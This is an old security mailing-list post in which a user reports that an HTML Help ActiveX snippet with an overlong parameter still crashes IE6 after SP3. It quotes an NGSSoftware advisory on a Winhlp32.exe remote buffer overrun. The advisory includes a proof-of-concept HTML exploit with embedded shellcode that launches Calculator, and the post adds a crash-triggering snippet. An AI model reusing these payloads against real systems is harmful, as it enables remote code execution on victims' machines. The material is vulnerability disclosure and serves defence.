I just installed servicepack 3 and the following code still crashed my my
IE6 with a memory could not be refferenced error.
<OBJECT ID=hhctrl TYPE="application/x-oleobject"
CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Shortcut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",,">
<PARAM name="Item2" value="273,1,1">
<PARAM name="codebase" value="">
<PARAM name="Font" value=" A VERY VERY LONG STRING ">
</OBJECT>
I have been told this means it is most likely exploitable. I am not into
buffer overflows myself though, maybe someone can confirm this. Anyways I
notified microsoft of this several months ago. The day after I notified them
someone pointed me to the ngssoftware advisory *sob*, and I notified
microsoft that this was probably the same issue, last I heard from them they
where looking in to if this was indeed the case. It's been several months
and as far as I know they are still looking.
--
jelmer
----- Original Message -----
From: "Next Generation Insight Security Research Team"
<mark@ngssoftware.com>
To: <bugtraq@securityfocus.com>; <ntbugtraq@listser.ntbugtraq.com>
Sent: Friday, August 02, 2002 3:59 AM
Subject: Winhelp32 Remote Buffer Overrun
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> NGSSoftware Insight Security Research Advisory
>
> Name: Winhlp32.exe Remote BufferOverrun
> Systems Affected: Win2K Platform
> Severity: Critical
> Category: Remote Buffer Overrun
> Vendor URL: http://www.mircosoft.com
> Author: Mark Litchfield (mark@ngssoftware.com)
> Date: 1st August 2002
> Advisory number: #NISR01082002
>
>
> Description
> ***********
>
> Many of the features available in HTML Help are implemented through
> the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX
> control is used to provide navigation features (such as a table of
> contents), to display secondary windows and pop-up definitions, and
> to provide other features. The HTML Help ActiveX control can be used
> from topics in a compiled Help system as well as from HTML pages
> displayed in a Web browser. The functionality provided by the HTML
> Help ActiveX control will run in the HTML Help Viewer or in any
> browser that supports ActiveX technology, such as Internet Explorer
> (version 3.01 or later). Some features, as with the WinHlp Command,
> provided by the HTML Help ActiveX control are meant to be available
> only when it is used from a compiled HTML Help file (.chm) that is
> displayed by using the HTML Help Viewer.
>
> Details
> *******
>
> Winhlp32.exe is vulnerable to a bufferoverrun attack using the Item
> parameter within WinHlp Command, the item parameter is used to
> specify the file path of the WinHelp (.hlp) file in which the WinHelp
> topic is stored, and the window name of the target window. Using
> this overrun, an attacker can successfully exectute arbitary code on
> a remote system by either encouraging the victim to visit a
> particular web page, whereby code would execute automatically, or by
> including the exploit within the source of an email. In regards to
> email, execution would automatically occur when the mail appears in
> the preview pane and ActiveX objects are allowed (This is allowed by
> default, the Internet Security Settings would have to be set as HIGH
> to prevent execution of this vulnerability). Any exploit would
> execute in the context of the logged on user.
>
> Visual POC Exploit
> ******************
>
> This POC will simply display Calculator. Please note that this
> written on a Win2k PC with SP2 installed. I have not tested it on
> anything else.
>
> <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
> codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
> type=application/x-oleobject width=0><PARAM NAME="Width"
> VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
> VALUE="WinHelp"><PARAM NAME="Item1"
> VALUE="3ĄPhcalc4$ƒĄPVøƧéw’Š3ĄP¾”éw’ÖAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
> PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGHƒĘ’ęgMyWindow"><PARAM
> NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
> <SCRIPT>winhelp.HHClick()</SCRIPT>
>
>
> Fix Information
> ***************
>
> NGSSoftware alerted Microsoft to these problems on the 6th March
> 2002. NGSSoftware highly recommend installing Microsoft Windows SP3,
> as the fix has been built into this service pack found at
> http://www.microsoft.com
> An alternative to these patches would be to ensure the security
> settings found in the Internet Options is set to high. Despite the
> Medium setting, stating that unsigned ActiveX controls will not be
> downloaded, Kylie will still execute Calc.exe. Another alternative
> would be to remove winhlp32.exe if it is not required within your
> environment.
> A check for these issues has been added to Typhon II, of which more
> information is available from the
> NGSSoftware website, http://www.ngssoftware.com.
>
> Further Information
> *******************
>
> For further information about the scope and effects of buffer
> overflows, please see
>
> http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
> http://www.ngssoftware.com/papers/ntbufferoverflow.html
> http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
> http://www.ngssoftware.com/papers/unicodebo.pdf
>
>
>
>
>
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
>
> iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p
> a+qSkYWrz7uspZcqqRTc2r0C
> =2PKN
> -----END PGP SIGNATURE-----
>
>
>
>
